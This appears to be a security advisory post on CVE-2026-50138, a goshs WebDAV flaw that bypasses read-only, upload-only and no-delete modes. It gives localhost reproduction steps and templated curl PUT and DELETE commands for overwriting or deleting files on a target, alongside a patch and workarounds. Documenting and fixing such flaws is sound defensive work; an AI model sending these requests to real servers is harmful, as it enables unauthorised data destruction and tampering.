Listen to this Post
CVE-2026-50138 is a vulnerability in the `goshs` Go package, a SimpleHTTPServer that supports file uploads, downloads, and WebDAV functionality. The issue arises when `goshs` is launched with the WebDAV feature enabled using the `-w` flag. In this configuration, the mode-restriction flags --read-only, --upload-only, and `–no-delete` are only enforced on the primary HTTP port.
The root cause lies in the server’s implementation. The WebDAV port is wired directly to the golang.org/x/net/webdav.Handler. In the file `httpserver/server.go` (lines 207-238), the WebDAV mux registers only IPWhitelistMiddleware, ServerHeaderMiddleware, and optionally BasicAuthMiddleware. Critically, it performs no check for the fs.ReadOnly, fs.UploadOnly, or `fs.NoDelete` flags on the WebDAV path. In contrast, the HTTP mux (lines 134-204) correctly checks these flags on every state-changing route.
This oversight allows an authenticated WebDAV client to perform write operations like PUT, DELETE, MKCOL, MOVE, and COPY, completely bypassing the operator’s intended restrictions. The impact is significant: `–read-only` and `–no-delete` are silently downgraded, offering no protection on the WebDAV port. Furthermore, `–upload-only` is also bypassed, as WebDAV GET/PROPFIND requests can still retrieve file contents. This breaks the trust of operators who use flags like `-w -ro -d /srv/case-files` to create an immutable directory for sharing engagement artifacts. The vulnerability affects all `goshs` versions up to and including v2.0.9 and was reported by Nishant Verma, who reproduced it live on 2026-05-27 against commit 8fc1e91.
DailyCVE Form
| Field | Value |
| : | : |
| Platform | goshs (Go) |
| Version | <= v2.0.9 |
| Vulnerability | WebDAV Mode Bypass |
| Severity | High |
| Date | 2026-07-01 |
| Prediction | 2026-07-15 |
What Undercode Say: Analytics
The vulnerability can be reproduced with the following steps, demonstrating how the mode flags are ignored on the WebDAV port.
1. Setup: Create a test directory and a secret file mkdir -p /tmp/r && echo secret > /tmp/r/x.txt 2. Start goshs with WebDAV enabled and in read-only mode goshs -p 18000 -wp 18001 -w -ro -d /tmp/r -b admin:pw & 3. Attempt to write via the primary HTTP port (correctly blocked) curl -u admin:pw -X PUT http://localhost:18000/y.txt --data x Expected output: 403 (Forbidden) 4. Attempt to write via the WebDAV port (bypasses the restriction) curl -u admin:pw -X PUT http://localhost:18001/y.txt --data x Unexpected output: 201 (Created) 5. Attempt to delete via the WebDAV port (bypasses the restriction) curl -u admin:pw -X DELETE http://localhost:18001/x.txt Unexpected output: 204 (No Content) 6. Attempt to create a directory via the WebDAV port (bypasses the restriction) curl -u admin:pw -X MKCOL http://localhost:18001/pwned/ Unexpected output: 201 (Created)
Exploit
An attacker with valid credentials (or in cases where authentication is not enforced) can exploit this vulnerability by directly interacting with the WebDAV port. By sending standard WebDAV requests to the WebDAV endpoint, they can perform unauthorized actions. For example, to overwrite a file:
curl -u <username>:<password> -X PUT http://<target-ip>:<webdav-port>/<path-to-file> --data-binary @<malicious-file>
To delete a file:
curl -u <username>:<password> -X DELETE http://<target-ip>:<webdav-port>/<path-to-file>
Protection
- Upgrade: The primary mitigation is to upgrade to a patched version of
goshs. The fix is available in version 2.1.0. - Workaround: If an immediate upgrade is not possible, a temporary workaround is to avoid using the `-w` flag to disable the WebDAV server entirely, or to restrict network access to the WebDAV port using a firewall.
- Suggested Fix: The official fix involves adding a middleware `http.HandlerFunc` in front of the `wdHandler` that checks the mode flags against the request method before allowing the request to proceed.
wdGuard := http.HandlerFunc(func(w http.ResponseWriter, r http.Request) { switch r.Method { case http.MethodPut, "MKCOL", "MOVE", "COPY": if fs.ReadOnly || fs.UploadOnly { http.Error(w, "read-only", 403) return } case http.MethodDelete: if fs.ReadOnly || fs.UploadOnly || fs.NoDelete { http.Error(w, "delete disabled", 403) return } case http.MethodGet, "PROPFIND", "HEAD": if fs.UploadOnly { http.Error(w, "upload-only", 403) return } } wdHandler.ServeHTTP(w, r) })
Impact
- Integrity: The `–read-only` and `–no-delete` flags are completely ineffective on the WebDAV port. Attackers can overwrite or delete any file the server process has access to, leading to data loss or corruption.
- Confidentiality: The `–upload-only` flag is also bypassed. An attacker could use WebDAV `GET` or `PROPFIND` requests to read the contents of the directory, potentially exposing sensitive information.
- Trust: Operators who rely on these flags to create a secure, immutable environment for sharing files (e.g., forensic artifacts or case files) will have their trust undermined, as the directory is not actually protected as intended.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

